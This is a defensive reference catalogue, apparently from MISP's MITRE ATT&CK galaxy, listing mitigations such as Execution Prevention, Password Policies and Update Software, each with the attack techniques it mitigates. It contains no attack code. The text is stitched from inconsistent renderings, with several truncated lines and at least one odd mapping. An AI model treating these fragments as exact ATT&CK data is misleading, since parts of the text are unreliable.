• mitigates: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/mitigations/M1050">https://attack.mitre.org/mitigations/M1050</a></td>
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**User Guidance - M1011**

Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.

The tag is: *misp-galaxy:mitre-course-of-action="User Guidance - M1011"*

User Guidance - M1011 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Obtain Device Cloud Backups - T1470" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
Enterprise Policy - M1012

An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.

The tag is: misp-galaxy:mitre-course-of-action="Enterprise Policy - M1012"

Enterprise Policy - M1012 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

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**Interconnection Filtering - M1014**

In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).

The tag is: misp-galaxy:mitre-course-of-action="Interconnection Filtering - M1014"

Interconnection Filtering - M1014 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449" with estimative-language:likelihood-probability="almost-certain"

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**Rootkit Mitigation - T1014**

Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Rootkit Mitigation - T1014"

Rootkit Mitigation - T1014 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-
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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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Update Software - M1051

Perform regular software updates to mitigate exploitation risk.

The tag is: `misp-galaxy:mitre-course-of-action="Update Software - M1051"`

Update Software - M1051 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with
- mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

Table 4110. Table References

Links

https://attack.mitre.org/mitigations/M1051

Vulnerability Scanning - M1016

Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.

The tag is: misp-galaxy:mitre-course-of-action="Vulnerability Scanning - M1016"

Vulnerability Scanning - M1016 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"

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Links

https://attack.mitre.org/mitigations/M1016
Mshta Mitigation - T1170

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: `misp-galaxy:mitre-course-of-action="Mshta Mitigation - T1170"`

Mshta Mitigation - T1170 has relationships with:


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User Training - M1017

Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

The tag is: `misp-galaxy:mitre-course-of-action="User Training - M1017"`

User Training - M1017 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176"` with estimative-language:likelihood-probability="almost-certain"

- mitigates: `misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213"` with estimative-language:likelihood-probability="almost-certain"


- mitigates: `misp-galaxy:mitre-attack-pattern="User Execution - T1204"` with estimative-language:likelihood-probability="almost-certain"


- mitigates: `misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192"` with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
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mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Service - T1598.001" with estimative-language:likelihood-probability="almost-certain"


mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"

mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"

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**Screensaver Mitigation - T1180**

Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary. (Citation: TechNet Screensaver GP)

The tag is: *misp-galaxy:mitre-course-of-action="Screensaver Mitigation - T1180"*

Screensaver Mitigation - T1180 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-
Rundll32 Mitigation - T1085

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: misp-galaxy:mitre-course-of-action="Rundll32 Mitigation - T1085"

Rundll32 Mitigation - T1085 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085" with estimative-language:likelihood-probability="almost-certain"

Hypervisor Mitigation - T1062

Prevent adversary access to privileged accounts necessary to install a hypervisor.

The tag is: misp-galaxy:mitre-course-of-action="Hypervisor Mitigation - T1062"

Hypervisor Mitigation - T1062 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Hypervisor - T1062" with estimative-language:likelihood-probability="almost-certain"

DCShadow Mitigation - T1207

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of AD design features. For example, mitigating specific AD API calls will likely have unintended side effects, such as preventing DC replication from operating properly. Efforts should
be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

The tag is: `misp-galaxy:mitre-course-of-action="DCShadow Mitigation - T1207"`

DCShadow Mitigation - T1207 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207"` with estimative-language:likelihood-probability="almost-certain"

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## Password Policies - M1027

Set and enforce secure password policies for accounts.

The tag is: `misp-galaxy:mitre-course-of-action="Password Policies - M1027"`

Password Policies - M1027 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184"` with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1503" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1142" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"
Kerberoasting Mitigation - T1208

Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. (Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible. (Citation: AdSecurity Cracking Kerberos Dec 2015)

The tag is: misp-galaxy:mitre-course-of-action="Kerberoasting Mitigation - T1208"

Kerberoasting Mitigation - T1208 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

Data Backup - M1053

Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.

The tag is: misp-galaxy:mitre-course-of-action="Data Backup - M1053"

Data Backup - M1053 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Defacement - T1491" with estimative-
masquerading mitigation - t1036

when creating security rules, avoid exclusions based on file name or file path. require signed binaries. use file system access controls to protect folders such as c:\windows\system32. use tools that restrict program execution via whitelisting by attributes other than file name.

identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting (citation: beechey 2010) tools like applocker (citation: windows commands jpcert) (citation: nsa ms applocker) or software restriction policies (citation: corio 2008) where appropriate. (citation: technet applocker vs srp)

the tag is: misp-galaxy:mitre-course-of-action="masquerading mitigation - t1036"

masquerading mitigation - t1036 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="masquerading - t1036" with estimative-language:likelihood-probability="almost-certain"
Execution Prevention - M1038

Block execution of code on a system through application control, and/or script blocking.

The tag is: misp-galaxy:mitre-course-of-action="Execution Prevention - M1038"

Execution Prevention - M1038 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1514" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"

Table 4.122. Table References

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<tr>
<td><a href="https://attack.mitre.org/mitigations/M1038">https://attack.mitre.org/mitigations/M1038</a></td>
</tr>
</tbody>
</table>

Software Configuration - M1054

Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.

The tag is: misp-galaxy:mitre-course-of-action="Software Configuration - M1054"

Software Configuration - M1054 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1506" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

Table 4123. Table References

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<tr>
<td><a href="https://attack.mitre.org/mitigations/M1054">https://attack.mitre.org/mitigations/M1054</a></td>
</tr>
</tbody>
</table>

**Code Signing - M1045**

Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
The tag is: `misp-galaxy:mitre-course-of-action="Code Signing - M1045"`

Code Signing - M1045 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Masquerading - T1036"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161"` with estimative-language:likelihood-probability="almost-certain"
